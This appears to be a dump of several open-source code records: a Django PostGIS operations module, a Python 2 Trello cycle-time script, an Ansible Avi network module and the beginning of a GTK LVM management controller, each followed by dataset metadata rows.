if (not geography and geodetic and lookup_type != 'dwithin'
and option == 'spheroid'):
# using distance_spheroid requires the spheroid of the field as
# a parameter.
return [f._spheroid, dist_param]
else:
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
ST_Transform() function call.
"""
if value is None or value.srid == f.srid:
placeholder = '%s'
else:
# Adding Transform() to the SQL placeholder.
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
if hasattr(value, 'as_sql'):
# If this is an F expression, then we don't really want
# a placeholder and instead substitute in the column
# of the expression.
sql, _ = compiler.compile(value)
placeholder = placeholder % sql
return placeholder
def _get_postgis_func(self, func):
"""
Helper routine for calling PostGIS functions and returning their result.
"""
# Close out the connection. See #9437.
with self.connection.temporary_connection() as cursor:
cursor.execute('SELECT %s()' % func)
return cursor.fetchone()[0]
def postgis_geos_version(self):
"Returns the version of the GEOS library used with PostGIS."
return self._get_postgis_func('postgis_geos_version')
def postgis_lib_version(self):
"Returns the version number of the PostGIS library used with PostgreSQL."
return self._get_postgis_func('postgis_lib_version')
def postgis_proj_version(self):
"Returns the version of the PROJ.4 library used with PostGIS."
return self._get_postgis_func('postgis_proj_version')
def postgis_version(self):
"Returns PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_version')
def postgis_full_version(self):
"Returns PostGIS version number and compile-time options."
return self._get_postgis_func('postgis_full_version')
def postgis_version_tuple(self):
"""
Returns the PostGIS version as a tuple (version string, major,
minor, subminor).
"""
# Getting the PostGIS version
version = self.postgis_lib_version()
m = self.version_regex.match(version)
if m:
major = int(m.group('major'))
minor1 = int(m.group('minor1'))
minor2 = int(m.group('minor2'))
else:
raise Exception('Could not parse PostGIS version string: %s' % version)
return (version, major, minor1, minor2)
def proj_version_tuple(self):
"""
Return the version of PROJ.4 used by PostGIS as a tuple of the
major, minor, and subminor release numbers.
"""
proj_regex = re.compile(r'(\d+)\.(\d+)\.(\d+)')
proj_ver_str = self.postgis_proj_version()
m = proj_regex.search(proj_ver_str)
if m:
return tuple(map(int, [m.group(1), m.group(2), m.group(3)]))
else:
raise Exception('Could not determine PROJ.4 version from PostGIS.')
def spatial_aggregate_name(self, agg_name):
if agg_name == 'Extent3D':
return self.extent3d
else:
return self.geom_func_prefix + agg_name
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
return PostGISGeometryColumns
def spatial_ref_sys(self):
return PostGISSpatialRefSys
| bsd-3-clause | 904,794,644,061,299,300 | 40.68144 | 107 | 0.608095 | false |
freyley/trello-traceability | cmds.py | 1 | 10762 | #!/usr/bin/env python
import pickle
import sys
from datetime import timedelta, datetime
import dateutil
import pytz
import models, trellointerface
def make_db():
models.main()
def fill_db():
trellointerface.main()
def test_conn():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
try:
organization = trelloclient.get_organization(settings.TRELLO_ORGANIZATION_ID)
except Exception, e:
print "Connection broken: {}".format(str(e))
sys.exit()
print "Connection OK"
return organization
def find_boards():
organization = test_conn()
for board in organization.get_boards('open'):
print "{} ({})".format(board.name, board.id)
def _check_item(action_list, key, value, startswith):
return action_list[key] == value or (startswith and action_list[key].startswith(value))
def _identify_list_from_identifiers(action_list, identify_mechanisms):
for key, value in identify_mechanisms.items():
startswith = False
if '__startswith' in key:
key = key.split('__')[0]
startswith = True
if isinstance(value, list) or isinstance(value, tuple):
for item in value:
if _check_item(action_list, key, item, startswith):
return True
else:
if _check_item(action_list, key, value, startswith):
return True
return False
def _going_to_a_done_list(action):
import settings
action_list = action['data']['listAfter']
return _identify_list_from_identifiers(action_list, settings.IDENTIFY_DONE_LIST)
def _going_to_a_started_list(action):
import settings
action_list = action['data']['listAfter']
return _identify_list_from_identifiers(action_list, settings.IDENTIFY_STARTING_LIST)
def _leaving_doing_for_committed(action):
import settings
before_list = action['data']['listBefore']
is_currently_doing = _identify_list_from_identifiers(before_list, settings.IDENTIFY_CURRENTLY_DOING_LIST)
after_list = action['data']['listAfter']
going_to_done = _identify_list_from_identifiers(after_list, settings.IDENTIFY_ANY_DONE_LIST)
return bool(is_currently_doing and going_to_done)
def _parse_date_or_ipdb(datey):
try:
return dateutil.parser.parse(datey)
except Exception, e:
import ipdb; ipdb.set_trace()
def close_complete():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
import os.path
PROJECT_DIR = os.path.dirname(__file__)
MOST_RECENT_DATE_FILENAME = os.path.join(PROJECT_DIR, 'most_recent_date')
try:
most_recent_date = pickle.load(open(MOST_RECENT_DATE_FILENAME))
except IOError:
utc = pytz.timezone("UTC")
most_recent_date = datetime.now(utc) - timedelta(100)
new_newest_date = most_recent_date
for board_id in [settings.CURRENT_STORY_BOARD] + settings.FUTURE_STORY_BOARD:
board = trelloclient.get_board(board_id)
board.fetch_actions('updateCheckItemStateOnCard')
actions = board.actions
for action in actions:
action_date = dateutil.parser.parse(action['date'])
if action_date > new_newest_date:
new_newest_date = action_date
if action_date <= most_recent_date:
break
if action['data']['checklist']['name'] == 'Meta':
item_name = action['data']['checkItem']['name']
if item_name.startswith('Epic Connection'):
epic_connection = action['data']['checkItem']['name']
epic_card_id = epic_connection.split(':')[1].strip()
card_id = action['data']['card']['id']
card_name = action['data']['card']['name']
epic = trelloclient.get_card(epic_card_id)
epic.fetch(eager=True)
for checklist in epic.checklists:
if checklist.name == 'Stories':
for item in checklist.items:
if item['name'].startswith(card_id):
print "Completing {} on epic {}".format(card_name, epic.name)
checklist.set_checklist_item(item['name'], checked=True)
pickle.dump(new_newest_date, open(MOST_RECENT_DATE_FILENAME, 'wb+'))
def find_cycle_times():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
CYCLE_TIME_IDENTIFIER = 'Cycle time:::'
FINISHED_IDENTIFIER = 'Finished:::'
STARTED_IDENTIFIER = 'Started:::'
ENGINEERING_IDENTIFIER = "Committed:::"
cycle_time_file = open(settings.CYCLE_TIMES_CSV_LOCATION, 'a')
board = trelloclient.get_board(settings.CURRENT_STORY_BOARD)
board.fetch_actions("updateCard:idList")
actions = board.actions
for action in actions:
action_date = dateutil.parser.parse(action['date'])
if _going_to_a_started_list(action):
card = trelloclient.get_card(action['data']['card']['id'])
card.fetch(eager=True)
for checklist in card.checklists:
if checklist.name == 'Meta':
checklist.found_started = False
for item in checklist.items:
if item['name'].startswith(STARTED_IDENTIFIER):
checklist.found_started = True
if not checklist.found_started:
checklist.add_checklist_item('{} {}'.format(STARTED_IDENTIFIER, action['date']))
print "Found started time for card {}".format(card.name)
elif _leaving_doing_for_committed(action):
card = trelloclient.get_card(action['data']['card']['id'])
card.fetch(eager=True)
for checklist in card.checklists:
if checklist.name == 'Meta':
checklist.found_engineering = False
for item in checklist.items:
if item['name'].startswith(ENGINEERING_IDENTIFIER):
checklist.found_engineering = True
if not checklist.found_engineering:
checklist.add_checklist_item('{} {}'.format(ENGINEERING_IDENTIFIER, action['date']))
print "Found engineering time for card {}".format(card.name)
elif _going_to_a_done_list(action):
card = trelloclient.get_card(action['data']['card']['id'])
card.fetch(eager=True)
for checklist in card.checklists:
if checklist.name == 'Meta':
checklist.found_done = False
checklist.started_time = checklist.finished_time = checklist.engineering_time = checklist.cycle_time = None
for item in checklist.items:
if item['name'].startswith(FINISHED_IDENTIFIER):
checklist.found_done = True
checklist.finished_time = _parse_date_or_ipdb(item['name'].split(FINISHED_IDENTIFIER)[1])
if item['name'].startswith(STARTED_IDENTIFIER):
checklist.started_time = _parse_date_or_ipdb(item['name'].split(STARTED_IDENTIFIER)[1])
if item['name'].startswith(ENGINEERING_IDENTIFIER):
checklist.engineering_time = _parse_date_or_ipdb((item['name'].split(ENGINEERING_IDENTIFIER)[1]))
if item['name'].startswith(CYCLE_TIME_IDENTIFIER):
checklist.cycle_time = float(item['name'].split(CYCLE_TIME_IDENTIFIER)[1])
if not checklist.found_done:
checklist.add_checklist_item('{} {}'.format(FINISHED_IDENTIFIER, action['date']))
print "Found finished time for card {}".format(card.name)
if checklist.started_time and checklist.finished_time:
engineering_time = ""
if checklist.engineering_time:
engineering_time = (action_date - checklist.engineering_time).total_seconds() / (60 * 60)
cycle_time = (action_date - checklist.started_time).total_seconds() / (60*60)
cycle_time_string = '{} {}'.format(CYCLE_TIME_IDENTIFIER, cycle_time)
if checklist.cycle_time is None:
checklist.add_checklist_item(cycle_time_string)
cycle_time_file.write('"{card.name}",{card.id},"{card.url}",{engineering_time},{cycle_time}\n'.format(
card=card, cycle_time=cycle_time, engineering_time=engineering_time))
print "Found cycle time for {}: {}".format(card.name, cycle_time_string)
def find_unconnected():
import settings
db_session = models.get_session()()
current_board_id = settings.CURRENT_STORY_BOARD
unconnected_cards = db_session.query(models.Card, models.TrelloList).filter(models.Card.trellolist_id==models.TrelloList.id).filter(models.Card.connected_to_id == None).filter(
models.TrelloList.board_id == current_board_id)
for card, tlist in unconnected_cards:
print "found disconnected card", card.name
def next_release():
import settings
from trello import TrelloClient
trelloclient = TrelloClient(
api_key=settings.TRELLO_API_KEY,
api_secret=settings.TRELLO_API_SECRET,
token=settings.TRELLO_OAUTH_TOKEN,
)
board = trelloclient.get_board(settings.CURRENT_STORY_BOARD)
for trellolist in board.get_lists('open'):
action_list = {'name': trellolist.name }
if _identify_list_from_identifiers(action_list, settings.IDENTIFY_DONE_LIST):
for card in trellolist.list_cards():
print card.name
cmds = {
'makedb': make_db,
'filldb': fill_db,
'test_conn': test_conn,
'find_boards': find_boards,
'complete': close_complete,
'cycletimes': find_cycle_times,
'unconnected': find_unconnected,
'next_release': next_release,
}
if len(sys.argv) < 2:
print "Available commands: {}".format(", ".join(cmds.keys()))
sys.exit()
cmds[sys.argv[1]]()
| agpl-3.0 | -5,345,407,224,313,717,000 | 43.655602 | 180 | 0.597194 | false |
maartenq/ansible | lib/ansible/modules/network/avi/avi_network.py | 20 | 4997 | #!/usr/bin/python
#
# @author: Gaurav Rastogi ([email protected])
# Eric Anderson ([email protected])
# module_check: supported
# Avi Version: 17.1.1
#
# Copyright: (c) 2017 Gaurav Rastogi, <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_network
author: Gaurav Rastogi ([email protected])
short_description: Module for setup of Network Avi RESTful Object
description:
- This module is used to configure Network object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent", "present"]
avi_api_update_method:
description:
- Default method for object update is HTTP PUT.
- Setting to patch will override that behavior to use HTTP PATCH.
version_added: "2.5"
default: put
choices: ["put", "patch"]
avi_api_patch_op:
description:
- Patch operation to use when using avi_api_update_method as patch.
version_added: "2.5"
choices: ["add", "replace", "delete"]
cloud_ref:
description:
- It is a reference to an object of type cloud.
configured_subnets:
description:
- List of subnet.
dhcp_enabled:
description:
- Select the ip address management scheme for this network.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
exclude_discovered_subnets:
description:
- When selected, excludes all discovered subnets in this network from consideration for virtual service placement.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
name:
description:
- Name of the object.
required: true
synced_from_se:
description:
- Boolean flag to set synced_from_se.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Unique object identifier of the object.
vcenter_dvs:
description:
- Boolean flag to set vcenter_dvs.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
vimgrnw_ref:
description:
- It is a reference to an object of type vimgrnwruntime.
vrf_context_ref:
description:
- It is a reference to an object of type vrfcontext.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Example to create Network object
avi_network:
controller: 10.10.25.42
username: admin
password: something
state: present
name: sample_network
"""
RETURN = '''
obj:
description: Network (api/network) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
cloud_ref=dict(type='str',),
configured_subnets=dict(type='list',),
dhcp_enabled=dict(type='bool',),
exclude_discovered_subnets=dict(type='bool',),
name=dict(type='str', required=True),
synced_from_se=dict(type='bool',),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
vcenter_dvs=dict(type='bool',),
vimgrnw_ref=dict(type='str',),
vrf_context_ref=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'network',
set([]))
if __name__ == '__main__':
main()
| gpl-3.0 | -350,158,778,468,453,000 | 32.092715 | 126 | 0.611767 | false |
andyvand/cygsystem-config-llvm | src/InputController.py | 1 | 100355 | """This class represents the primary controller interface
for the LVM UI application.
"""
import string
import os
import re
import stat
import os.path
import gobject
from lvm_model import lvm_model
from CommandHandler import CommandHandler
from lvmui_constants import *
from CommandError import CommandError
import Fstab
import Filesystem
from Segment import STRIPED_SEGMENT_ID
from ExtentBlock import ExtentBlock
from WaitMsg import WaitMsg
import PhysicalVolume
from execute import execWithCapture, execWithCaptureErrorStatus, execWithCaptureStatus
from utilities import follow_links_to_target
import gettext
_ = gettext.gettext
### gettext first, then import gtk (exception prints gettext "_") ###
try:
import gtk
import gtk.glade
except RuntimeError, e:
print _("""
Unable to initialize graphical environment. Most likely cause of failure
is that the tool was not run using a graphical environment. Please either
start your graphical user interface or set your DISPLAY variable.
Caught exception: %s
""") % e
sys.exit(-1)
import gnome
import gnome.ui
SIZE_COL = TYPE_COL
VOL_TYPE_COL = 3
UNALLOC_VOL = 0
UNINIT_VOL = 1
###TRANSLATOR: The string below is seen when adding a new Physical
###Volume to an existing Volume Group.
ADD_PV_TO_VG_LABEL=_("Select a Volume Group to add %s to:")
MEGA_MULTIPLIER = 1000000.0
GIGA_MULTIPLIER = 1000000000.0
KILO_MULTIPLIER = 1000.0
DEFAULT_STRIPE_SIZE_IDX = 4
MAX_PHYSICAL_VOLS = 256
MAX_LOGICAL_VOLS = 256
DEFAULT_EXTENT_SIZE = 4
DEFAULT_EXTENT_SIZE_MEG_IDX = 1
DEFAULT_EXTENT_SIZE_KILO_IDX = 2
NO_FILESYSTEM_FS = 0
ACCEPTABLE_STRIPE_SIZES = [4,8,16,32,64,128,256,512]
ACCEPTABLE_EXTENT_SIZES = ["2","4","8","16","32","64","128","256","512","1024"]
###TRANSLATOR: The two strings below refer to the name and type of
###available disk entities on the system. There are two types --
###The first is an 'unallocated physical volume' which is a disk or
###partition that has been initialized for use with LVM, by writing
###a special label onto the first block of the partition. The other type
###is an 'uninitialized entity', which is an available disk or partition
###that is NOT yet initialized to be used with LVM. Hope this helps give
###some context.
ENTITY_NAME=_("Name")
ENTITY_SIZE=_("Size")
ENTITY_TYPE=_("Entity Type")
UNALLOCATED_PV=_("Unallocated Physical Volume")
UNINIT_DE=_("Uninitialized Disk Entity")
ADD_VG_LABEL=_("Select disk entities to add to the %s Volume Group:")
CANT_STRIPE_MESSAGE=_("A Volume Group must be made up of two or more Physical Volumes to support striping. This Volume Group does not meet that requirement.")
NON_UNIQUE_NAME=_("A Logical Volume with the name %s already exists in this Volume Group. Please choose a unique name.")
NON_UNIQUE_VG_NAME=_("A Volume Group with the name %s already exists. Please choose a unique name.")
MUST_PROVIDE_NAME=_("A Name must be provided for the new Logical Volume")
MUST_PROVIDE_VG_NAME=_("A Name must be provided for the new Volume Group")
BAD_MNT_POINT=_("The specified mount point, %s, does not exist. Do you wish to create it?")
BAD_MNT_CREATION=_("The creation of mount point %s unexpectedly failed.")
NOT_IMPLEMENTED=_("This capability is not yet implemented in this version")
EXCEEDED_MAX_LVS=_("The number of Logical Volumes in this Volume Group has reached its maximum limit.")
EXCEEDED_MAX_PVS=_("The number of Physical Volumes in this Volume Group has reached its maximum limit.")
EXCEEDING_MAX_PVS=_("At most %s Physical Volumes can be added to this Volume Group before the limit is reached.")
NOT_ENOUGH_SPACE_FOR_NEW_LV=_("Volume Group %s does not have enough space for new Logical Volumes. A possible solution would be to add an additional Physical Volume to the Volume Group.")
ALREADY_A_SNAPSHOT=_("A snapshot of a snapshot is not supported.")
CANNOT_SNAPSHOT_A_MIRROR=_("A snapshot of a mirrored Logical Volume is not supported.")
CANNOT_REMOVE_UNDER_SNAPSHOT=_("Logical volume %s has snapshot %s currently associated with it. Please remove the snapshot first.")
CANNOT_REMOVE_UNDER_SNAPSHOTS=_("Logical volume %s has snapshots: %s currently associated with it. Please remove snapshots first.")
TYPE_CONVERSION_ERROR=_("Undefined type conversion error in model factory. Unable to complete task.")
MOUNTED_WARNING=_("BIG WARNING: Logical Volume %s has an %s file system on it and is currently mounted on %s. Are you absolutely certain that you wish to discard the data on this mounted filesystem?")
UNMOUNT_PROMPT=_("Logical Volume %s is currently mounted on %s. In order to complete request, it has to be unmounted. Are you sure you want it unmounted?")
###TRANSLATOR: An extent below is an abstract unit of storage. The size
###of an extent is user-definable.
REMAINING_SPACE_VGNAME=_("Unused space on %s")
REMAINING_SPACE_MEGABYTES=_("%s megabytes")
REMAINING_SPACE_KILOBYTES=_("%s kilobytes")
REMAINING_SPACE_GIGABYTES=_("%s gigabytes")
REMAINING_SPACE_EXTENTS=_("%s extents")
REMAINING_SPACE_VG=_("Remaining free space in Volume Group:\n")
REMAINING_SPACE_AFTER=_("Remaining space for this Volume:\n")
EXTENTS=_("Extents")
GIGABYTES=_("Gigabytes")
MEGABYTES=_("Megabytes")
KILOBYTES=_("Kilobytes")
NUMBERS_ONLY=_("The %s should only contain number values")
NUMBERS_ONLY_MAX_PVS=_("The Maximum Physical Volumes field should contain only integer values between 1 and 256")
NUMBERS_ONLY_MAX_LVS=_("The Maximum Logical Volumes field should contain only integer values between 1 and 256")
CONFIRM_PVREMOVE=_("Are you quite certain that you wish to remove %s from Logical Volume Management?")
SOLO_PV_IN_VG=_("The Physical Volume named %s, that you wish to remove, has data from active Logical Volume(s) mapped to its extents. Because it is the only Physical Volume in the Volume Group, there is no place to move the data to. Recommended action is either to add a new Physical Volume before removing this one, or else remove the Logical Volumes that are associated with this Physical Volume.")
CONFIRM_PV_VG_REMOVE=_("Are you quite certain that you wish to remove %s from the %s Volume Group?")
CONFIRM_VG_REMOVE=_("Removing Physical Volume %s from the Volume Group %s will leave the Volume group empty, and it will be removed as well. Do you wish to proceed?")
NOT_ENOUGH_SPACE_VG=_("Volume Group %s does not have enough space to move the data stored on %s. A possible solution would be to add an additional Physical Volume to the Volume Group.")
NO_DM_MIRROR=_("The dm-mirror module is either not loaded in your kernel, or your kernel does not support the dm-mirror target. If it is supported, try running \"modprobe dm-mirror\". Otherwise, operations that require moving data on Physical Extents are unavailable.")
NO_DM_SNAPSHOT=_("The dm-snapshot module is either not loaded in your kernel, or your kernel does not support the dm-snapshot target. If it is supported, try running \"modprobe dm-snapshot\". Otherwise, creation of snapshots is unavailable.")
CONFIRM_LV_REMOVE=_("Are you quite certain that you wish to remove logical volume %s?")
CONFIRM_LV_REMOVE_FILESYSTEM=_("Logical volume %s contains %s filesystem. All data on it will be lost! Are you quite certain that you wish to remove logical volume %s?")
CONFIRM_LV_REMOVE_MOUNTED=_("Logical volume %s contains data from directory %s. All data in it will be lost! Are you quite certain that you wish to remove logical volume %s?")
###########################################################
class InputController:
def __init__(self, reset_tree_model, treeview, model_factory, glade_xml):
self.reset_tree_model = reset_tree_model
self.treeview = treeview
self.model_factory = model_factory
self.glade_xml = glade_xml
self.command_handler = CommandHandler()
self.section_list = list()
self.section_type = UNSELECTABLE_TYPE
self.setup_dialogs()
# check if pvmove is in progress
if self.model_factory.pvmove_in_progress():
self.command_handler.complete_pvmove()
def setup_dialogs(self):
self.init_entity_button = self.glade_xml.get_widget('uninit_button')
self.init_entity_button.connect("clicked", self.on_init_entity)
self.setup_new_vg_form()
#self.setup_pv_rm_migrate()
#self.setup_pv_rm()
###################
##This form adds an unallocated PV to a VG
self.add_pv_to_vg_dlg = self.glade_xml.get_widget('add_pv_to_vg_form')
self.add_pv_to_vg_dlg.connect("delete_event",self.add_pv_to_vg_delete_event)
self.add_pv_to_vg_button = self.glade_xml.get_widget('add_pv_to_vg_button')
self.add_pv_to_vg_button.connect("clicked",self.on_add_pv_to_vg)
self.add_pv_to_vg_treeview = self.glade_xml.get_widget('add_pv_to_vg_treeview')
self.ok_add_pv_to_vg_button = self.glade_xml.get_widget('ok_add_pv_to_vg_button')
self.ok_add_pv_to_vg_button.connect("clicked",self.on_ok_add_pv_to_vg)
self.cancel_add_pv_to_vg_button = self.glade_xml.get_widget('cancel_add_pv_to_vg_button')
self.cancel_add_pv_to_vg_button.connect("clicked",self.on_cancel_add_pv_to_vg)
self.add_pv_to_vg_label = self.glade_xml.get_widget('add_pv_to_vg_label')
model = gtk.ListStore (gobject.TYPE_STRING,
gobject.TYPE_STRING)
self.add_pv_to_vg_treeview.set_model(model)
renderer1 = gtk.CellRendererText()
column1 = gtk.TreeViewColumn("Volume Groups",renderer1, text=0)
self.add_pv_to_vg_treeview.append_column(column1)
renderer2 = gtk.CellRendererText()
column2 = gtk.TreeViewColumn("Size",renderer2, text=1)
self.add_pv_to_vg_treeview.append_column(column2)
# new lv button
self.new_lv_button = self.glade_xml.get_widget('new_lv_button')
self.new_lv_button.connect("clicked",self.on_new_lv)
self.setup_extend_vg_form()
self.setup_misc_widgets()
##################
##This form adds a new VG
def setup_new_vg_form(self):
self.new_vg_dlg = self.glade_xml.get_widget('new_vg_form')
self.new_vg_dlg.connect("delete_event",self.new_vg_delete_event)
self.new_vg_button = self.glade_xml.get_widget('new_vg_button')
self.new_vg_button.connect("clicked", self.on_new_vg)
self.ok_new_vg_button = self.glade_xml.get_widget('ok_new_vg_button')
self.ok_new_vg_button.connect("clicked",self.ok_new_vg)
self.cancel_new_vg_button = self.glade_xml.get_widget('cancel_new_vg_button')
self.cancel_new_vg_button.connect("clicked", self.cancel_new_vg)
##Buttons and fields...
self.new_vg_name = self.glade_xml.get_widget('new_vg_name')
self.new_vg_max_pvs = self.glade_xml.get_widget('new_vg_max_pvs')
self.new_vg_max_lvs = self.glade_xml.get_widget('new_vg_max_lvs')
self.new_vg_extent_size = self.glade_xml.get_widget('new_vg_extent_size')
self.new_vg_radio_meg = self.glade_xml.get_widget('radiobutton1')
self.new_vg_radio_meg.connect('clicked', self.change_new_vg_radio)
self.new_vg_radio_kilo = self.glade_xml.get_widget('radiobutton2')
self.new_vg_clustered = self.glade_xml.get_widget('clustered_butt')
def on_new_vg(self, button):
self.prep_new_vg_dlg()
self.new_vg_dlg.show()
def cancel_new_vg(self, button):
self.new_vg_dlg.hide()
def ok_new_vg(self, button):
Name_request = ""
max_physical_volumes = 256
max_logical_volumes = 256
phys_extent_size = 8
phys_extent_units_meg = True
autobackup = True
resizable = True
selection = self.treeview.get_selection()
model,iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
proposed_name = self.new_vg_name.get_text().strip()
if proposed_name == "":
self.errorMessage(MUST_PROVIDE_VG_NAME)
return
#Now check for unique name
vg_list = self.model_factory.get_VGs()
for vg in vg_list:
if vg.get_name() == proposed_name:
self.new_vg_name.select_region(0, (-1))
self.errorMessage(NON_UNIQUE_VG_NAME % proposed_name)
return
Name_request = proposed_name
max_pvs_field = self.new_vg_max_pvs.get_text()
if max_pvs_field.isalnum() == False:
self.errorMessage(NUMBERS_ONLY_MAX_PVS)
self.new_vg_max_pvs.set_text(str(MAX_PHYSICAL_VOLS))
return
else:
max_pvs = int(max_pvs_field)
if (max_pvs < 1) or (max_pvs > MAX_PHYSICAL_VOLS):
self.errorMessage(NUMBERS_ONLY_MAX_PVS)
self.new_vg_max_pvs.set_text(str(MAX_PHYSICAL_VOLS))
return
max_physical_volumes = max_pvs
max_lvs_field = self.new_vg_max_lvs.get_text()
if max_lvs_field.isalnum() == False:
self.errorMessage(NUMBERS_ONLY_MAX_LVS)
self.new_vg_max_lvs.set_text(str(MAX_LOGICAL_VOLS))
return
else:
max_lvs = int(max_lvs_field)
if (max_lvs < 1) or (max_lvs > MAX_LOGICAL_VOLS):
self.errorMessage(NUMBERS_ONLY_MAX_LVS)
self.new_vg_max_lvs.set_text(str(MAX_LOGICAL_VOLS))
return
max_logical_volumes = max_lvs
extent_idx = self.new_vg_extent_size.get_history()
phys_extent_units_meg = self.new_vg_radio_meg.get_active()
clustered = self.new_vg_clustered.get_active()
if clustered:
msg = _("In order for Volume Group to be safely used in clustered environment, lvm2-cluster rpm has to be installed, `lvmconf --enable-cluster` has to be executed and clvmd service has to be running")
self.infoMessage(msg)
try:
self.command_handler.create_new_vg(Name_request,
str(max_physical_volumes),
str(max_logical_volumes),
ACCEPTABLE_EXTENT_SIZES[extent_idx],
phys_extent_units_meg,
pv.get_path(),
clustered)
except CommandError, e:
self.errorMessage(e.getMessage())
self.new_vg_dlg.hide()
apply(self.reset_tree_model, [Name_request])
def prep_new_vg_dlg(self):
self.new_vg_name.set_text("")
self.new_vg_max_pvs.set_text(str(MAX_PHYSICAL_VOLS))
self.new_vg_max_lvs.set_text(str(MAX_LOGICAL_VOLS))
self.new_vg_radio_meg.set_active(True)
self.new_vg_extent_size.set_history(DEFAULT_EXTENT_SIZE_MEG_IDX)
self.new_vg_clustered.set_active(False)
def change_new_vg_radio(self, button):
menu = self.new_vg_extent_size.get_menu()
items = menu.get_children()
#We don't want to offer the 2 and 4 options for kilo's - min size is 8k
if self.new_vg_radio_meg.get_active() == True:
items[0].set_sensitive(True)
items[1].set_sensitive(True)
self.new_vg_extent_size.set_history(DEFAULT_EXTENT_SIZE_MEG_IDX)
else:
items[0].set_sensitive(False)
items[1].set_sensitive(False)
self.new_vg_extent_size.set_history(DEFAULT_EXTENT_SIZE_KILO_IDX)
def on_pv_rm(self, button):
self.remove_pv()
def remove_pv(self, pv=None):
mapped_lvs = True
solo_pv = False
reset_tree = False
if pv == None:
reset_tree = True #This says that tree reset will not be handled by caller
selection = self.treeview.get_selection()
model, iter = selection.get_selected()
pv = model.get_value(iter, OBJ_COL)
vg = pv.get_vg()
# first check if all extents can be migrated
for extent in pv.get_extent_blocks():
extents_lv = extent.get_lv()
if extents_lv.is_used():
error_message = None
if extents_lv.is_mirror_log:
error_message = _("Physical Volume %s contains extents belonging to a mirror log of Logical Volume %s. Mirrored Logical Volumes are not yet migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), extents_lv.get_name(), pv.get_path())
elif extents_lv.is_mirror_image:
error_message = _("Physical Volume %s contains extents belonging to a mirror image of Logical Volume %s. Mirrored Logical Volumes are not yet migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), extents_lv.get_name(), pv.get_path())
elif extents_lv.is_snapshot():
error_message = _("Physical Volume %s contains extents belonging to %s, a snapshot of %s. Snapshots are not yet migratable, so %s is not removable.")
error_message = error_message % (pv.get_path(), extents_lv.get_name(), extents_lv.get_snapshot_info()[0].get_name(), pv.get_path())
elif extents_lv.has_snapshots():
snapshots = extents_lv.get_snapshots()
if len(snapshots) == 1:
error_message = _("Physical Volume %s contains extents belonging to %s, the origin of snapshot %s. Snapshot origins are not yet migratable, so %s is not removable.")
else:
error_message = _("Physical Volume %s contains extents belonging to %s, the origin of snapshots %s. Snapshot origins are not yet migratable, so %s is not removable.")
snapshots_string = snapshots[0].get_name()
for snap in snapshots[1:]:
snapshot_string = snapshot_string + ', ' + snap.get_name()
error_message = error_message % (pv.get_path(), extents_lv.get_name(), snapshots_string, pv.get_path())
if error_message != None:
self.errorMessage(error_message)
return False
#The following cases must be considered in this method:
#1) a PV is to be removed that has extents mapped to an LV:
# 1a) if there are other PVs, call pvmove on the PV to migrate the
# data to other PVs in the VG
# i) If there is sufficient room, pvmove the extents, then vgreduce
# ii) If there is not room, inform the user to add more storage and
# try again later
# 1b) If there are not other PVs, state that either more PVs must
# be added so that the in use extents can be migrated, or else
# present a list of LVs that must be removed in order to
# remove the PV
#2) a PV is to be removed that has NO LVs mapped to its extents:
# 2a) If there are more than one PV in the VG, just vgreduce away the PV
# 2b) If the PV is the only one, then vgremove the VG
#
total, alloc, free = pv.get_extent_total_used_free()
pv_list = vg.get_pvs().values()
if len(pv_list) <= 1: #This PV is the only one in the VG
solo_pv = True
else:
solo_pv = False
extent_list = pv.get_extent_blocks()[:] # copy
if len(extent_list) == 1: #There should always be at least one extent seg
#We now know either the entire PV is used by one LV, or else it is
#an unutilized PV. If the latter, we can just vgreduce it away
#if (seg_name == FREE) or (seg_name == UNUSED):
if extent_list[0].get_lv().is_used():
mapped_lvs = True
else:
mapped_lvs = False
else:
mapped_lvs = True
#Cases:
if mapped_lvs == False:
if solo_pv:
#call vgremove
retval = self.warningMessage(CONFIRM_VG_REMOVE % (pv.get_path(),vg.get_name()))
if (retval == gtk.RESPONSE_NO):
return False
try:
